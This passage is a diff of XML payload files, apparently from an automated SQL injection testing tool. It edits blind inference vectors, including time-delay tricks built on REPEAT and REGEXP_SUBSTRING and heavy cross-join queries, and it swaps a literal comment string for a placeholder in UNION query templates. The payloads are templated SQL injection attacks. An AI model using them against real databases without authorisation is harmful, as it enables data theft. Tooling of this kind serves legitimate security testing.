<vector>(SELECT COUNT(*) FROM (SELECT * FROM DOMAIN.DOMAINS WHERE ([INFERENCE])) AS T1,(SELECT * FROM DOMAIN.COLUMNS WHERE ([INFERENCE])) AS T2,(SELECT * FROM DOMAIN.TABLES WHERE ([INFERENCE])) AS T3)</vector>
<request>
@@ -1705,7 +1705,7 @@
<stype>5</stype>
<level>5</level>
<risk>2</risk>
<clause>1,2,3</clause>
<clause>1,2,3,9</clause>
<where>3</where>
<vector>(SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3 WHERE ([INFERENCE]))</vector>
<request>
@@ -1725,7 +1725,7 @@
<stype>5</stype>
<level>4</level>
<risk>2</risk>
<clause>1,2,3</clause>
<clause>1,2,3,9</clause>
<where>1</where>
<vector>(SELECT (CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]00000000),NULL) ELSE '[RANDSTR]' END) FROM INFORMATION_SCHEMA.SYSTEM_USERS)</vector>
<request>
@@ -1745,7 +1745,7 @@
<stype>5</stype>
<level>5</level>
<risk>2</risk>
<clause>1,2,3</clause>
<clause>1,2,3,9</clause>
<where>1</where>
<vector>(SELECT (CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL) ELSE '[RANDSTR]' END) FROM (VALUES(0)))</vector>
<request>

36
xml/payloads/06_union_query.xml
View File

@@ -12,7 +12,7 @@
<vector>[UNION]</vector>
<request>
<payload/>
<comment>-- -</comment>
<comment>[GENERIC_SQL_COMMENT]</comment>
<char>[CHAR]</char>
<columns>[COLSTART]-[COLSTOP]</columns>
</request>
@@ -31,7 +31,7 @@
<vector>[UNION]</vector>
<request>
<payload/>
<comment>-- -</comment>
<comment>[GENERIC_SQL_COMMENT]</comment>
<char>NULL</char>
<columns>[COLSTART]-[COLSTOP]</columns>
</request>
@@ -50,7 +50,7 @@
<vector>[UNION]</vector>
<request>
<payload/>
<comment>-- -</comment>
<comment>[GENERIC_SQL_COMMENT]</comment>
<char>[RANDNUM]</char>
<columns>[COLSTART]-[COLSTOP]</columns>
</request>
@@ -69,7 +69,7 @@
<vector>[UNION]</vector>
<request>
<payload/>
<comment>-- -</comment>
<comment>[GENERIC_SQL_COMMENT]</comment>
<char>[CHAR]</char>
<columns>1-10</columns>
</request>
@@ -88,7 +88,7 @@
<vector>[UNION]</vector>
<request>
<payload/>
<comment>-- -</comment>
<comment>[GENERIC_SQL_COMMENT]</comment>
<char>NULL</char>
<columns>1-10</columns>
</request>
@@ -107,7 +107,7 @@
<vector>[UNION]</vector>
<request>
<payload/>
<comment>-- -</comment>
<comment>[GENERIC_SQL_COMMENT]</comment>
<char>[RANDNUM]</char>
<columns>1-10</columns>
</request>
@@ -126,7 +126,7 @@
<vector>[UNION]</vector>
<request>
<payload/>
<comment>-- -</comment>
<comment>[GENERIC_SQL_COMMENT]</comment>
<char>[CHAR]</char>
<columns>11-20</columns>
</request>
@@ -145,7 +145,7 @@
<vector>[UNION]</vector>
<request>
<payload/>
<comment>-- -</comment>
<comment>[GENERIC_SQL_COMMENT]</comment>
<char>NULL</char>
<columns>11-20</columns>
</request>
@@ -164,7 +164,7 @@
<vector>[UNION]</vector>
<request>
<payload/>
<comment>-- -</comment>
<comment>[GENERIC_SQL_COMMENT]</comment>
<char>[RANDNUM]</char>
<columns>11-20</columns>
</request>
@@ -183,7 +183,7 @@
<vector>[UNION]</vector>
<request>
<payload/>
<comment>-- -</comment>
<comment>[GENERIC_SQL_COMMENT]</comment>
<char>[CHAR]</char>
<columns>21-30</columns>
</request>
@@ -202,7 +202,7 @@
<vector>[UNION]</vector>
<request>
<payload/>
<comment>-- -</comment>
<comment>[GENERIC_SQL_COMMENT]</comment>
<char>NULL</char>
<columns>21-30</columns>
</request>
@@ -221,7 +221,7 @@
<vector>[UNION]</vector>
<request>
<payload/>
<comment>-- -</comment>
<comment>[GENERIC_SQL_COMMENT]</comment>
<char>[RANDNUM]</char>
<columns>21-30</columns>
</request>
@@ -240,7 +240,7 @@
<vector>[UNION]</vector>
<request>
<payload/>
<comment>-- -</comment>
<comment>[GENERIC_SQL_COMMENT]</comment>
<char>[CHAR]</char>
<columns>31-40</columns>
</request>
@@ -259,7 +259,7 @@
<vector>[UNION]</vector>
<request>
<payload/>
<comment>-- -</comment>
<comment>[GENERIC_SQL_COMMENT]</comment>
<char>NULL</char>
<columns>31-40</columns>
</request>
@@ -278,7 +278,7 @@
<vector>[UNION]</vector>
<request>
<payload/>
<comment>-- -</comment>
<comment>[GENERIC_SQL_COMMENT]</comment>
<char>[RANDNUM]</char>
<columns>31-40</columns>
</request>
@@ -297,7 +297,7 @@
<vector>[UNION]</vector>
<request>
<payload/>
<comment>-- -</comment>
<comment>[GENERIC_SQL_COMMENT]</comment>
<char>[CHAR]</char>
<columns>41-50</columns>
</request>
@@ -315,7 +315,7 @@
<vector>[UNION]</vector>
<request>
<payload/>
<comment>-- -</comment>
<comment>[GENERIC_SQL_COMMENT]</comment>
<char>NULL</char>
<columns>41-50</columns>
</request>
@@ -334,7 +334,7 @@
<vector>[UNION]</vector>
<request>
<payload/>
<comment>-- -</comment>
<comment>[GENERIC_SQL_COMMENT]</comment>
<char>[RANDNUM]</char>
<columns>41-50</columns>
</request>